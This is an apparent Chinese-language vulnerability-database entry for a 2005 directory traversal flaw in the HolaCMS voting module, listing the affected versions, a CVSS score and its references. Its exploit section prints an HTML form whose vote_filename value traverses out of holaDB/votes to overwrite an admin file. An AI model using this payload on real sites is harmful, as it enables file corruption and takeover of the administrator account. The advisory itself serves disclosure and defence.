发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:14:41

[原文]Directory traversal vulnerability in HolaCMS 1.4.9-1 allows remote attackers to overwrite arbitrary files via a "holaDB/votes" followed by a .. (dot dot) in the vote_filename parameter, which bypasses the check by HolaCMS to ensure that the file is in the holaDB/votes directory.


        HolaCMS 1.4.9-1中的目录遍历漏洞,允许远程攻击者通过在vote_filename参数的"holaDB/votes"后跟..(点点)来重写任意文件,从而绕过HolaCMS的检查以确保文件位于holaDB/votes目录下。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20050315 Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

- 漏洞信息

中危 路径遍历
2005-05-02 00:00:00 2005-10-20 00:00:00
        HolaCMS 1.4.9-1中的目录遍历漏洞,允许远程攻击者通过在vote_filename参数的"holaDB/votes"后跟..(点点)来重写任意文件,从而绕过HolaCMS的检查以确保文件位于holaDB/votes目录下。

- 公告与补丁


- 漏洞信息

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability
Input Validation Error 12799
Yes No
2005-03-13 12:00:00 2009-07-12 10:56:00
Discovery is credited to Virginity Security.

- 受影响的程序版本

Hola HolaCMS 1.4.9 -1
Hola HolaCMS 1.4.9
Hola HolaCMS 1.4.8
Hola HolaCMS 1.4.7
Hola HolaCMS 1.4.6
Hola HolaCMS 1.4.5
Hola HolaCMS 1.4.4
Hola HolaCMS 1.4.3
Hola HolaCMS 1.4.2 a
Hola HolaCMS 1.4.2
Hola HolaCMS 1.4.1
Hola HolaCMS 1.4
Hola HolaCMS 1.2.10
Hola HolaCMS 1.2.9

- 漏洞讨论

HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server.

This issue is similar to the vulnerability described in BID 12789 (HolaCMS Voting Module Remote File Corruption Vulnerability). It is reported that HolaCMS 1.4.9-1, which was released to address the issue in BID 12789 is still vulnerable to a variant of that issue.

Specifically, an attacker can bypass the fix introduced in HolaCMS 1.4.9-1 by including directory traversal sequences in the path to a target file.

HolaCMS 1.4.9-1 and prior versions are affected by this issue.

- 漏洞利用

The following example was provided using a form to submit a custom HTTP POST to the site:

<form action="[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: <>.

- 相关参考